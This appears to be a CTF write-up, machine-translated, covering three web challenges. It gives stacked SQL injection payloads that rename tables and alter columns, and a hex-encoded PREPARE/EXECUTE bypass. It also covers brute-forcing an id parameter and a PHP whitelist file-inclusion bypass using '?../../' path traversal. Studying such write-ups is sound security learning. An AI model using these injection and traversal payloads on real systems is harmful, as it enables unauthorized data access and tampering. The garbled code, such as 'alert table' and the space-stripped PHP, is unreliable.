Burst field payload:1';show columns from words;# payload:1';show columns from 1919810931114514;#
The problem environment seems to be a problem. The fields of the second table cannot be exposed.
Rename the words table to another table name through rename.
Change the name of the 1919810931114514 table to words.
Add a new column name id to the new words table.
Rename the flag to data
1'; rename table words to word1; rename table `1919810931114514` to words; alert table words add id int unsigned not Null auto_increment primary key ; alert table words change flag data varchar(100); #
Enter 1 to get the flag
The second solution
Because the select is filtered
So it can be encoded in hexadecimal
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
prepare...from... is a prepared statement, which will perform encoding conversion
Execute is used to execute the SQL statement created by SQLPrepare
SELECT can assign values to multiple variables at the same time in one statement, while SET can only assign values to one variable at a time.
The third solution : rewrite the upgraded version of the topic
ics-06
The cloud platform report center collected data on basic equipment management services, but the data was deleted, leaving only one trace of the intruder.
There is an id to visit
ID blasting directly with burpsuit
The value I set is 1-10000, but 1-3000 is enough
warmup
My real web problem
Since I did this question, I really started to learn web security
Hate myself for not knowing myself earlier
F12 View source code access source.php
Code audit post the code
<?phphighlight_file(__FILE__);classemmm{
publicstaticfunctioncheckFile(&$page){
$whitelist=["source"=>"source.php","hint"=>"hint.php"];if(!isset($page)||!is_string($page)){
echo"you can't see it";returnfalse;}if(in_array($page,$whitelist)){
returntrue;}$_page=mb_substr($page,0,mb_strpos($page.'?',"?"));if(in_array($_page,$whitelist)){
returntrue;}$_page=urldecode($page);$_page=mb_substr($_page,0,mb_strpos($_page.'?',"?"));if(in_array($_page,$whitelist)){
returntrue;}echo"you can't see it";returnfalse;}}if(!empty($_REQUEST['file'])&&is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])){
include$_REQUEST['file'];
exit;}else{
echo"<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}?>
Audit a wave
First of all, it is necessary to determine whether the file is empty, whether the file is a string, and then the determination of the checkFile() function
If successful, this file containing the value of file will be included
Audit checkFile()
First of all, a whitelist must be uploaded. File is called page in checkfile.
page is not empty, it is a string, and page must be in the whitelist
The next step is to intercept the first letter of the page to the position where the? Appears
Here you can give the payload
?file=hint.php?../../../../../ffffllllaaaaggggThis is an unexpected
If you don’t solve the problem unexpectedly
A url decoding was performed in the php file, and the background server performed a url decoding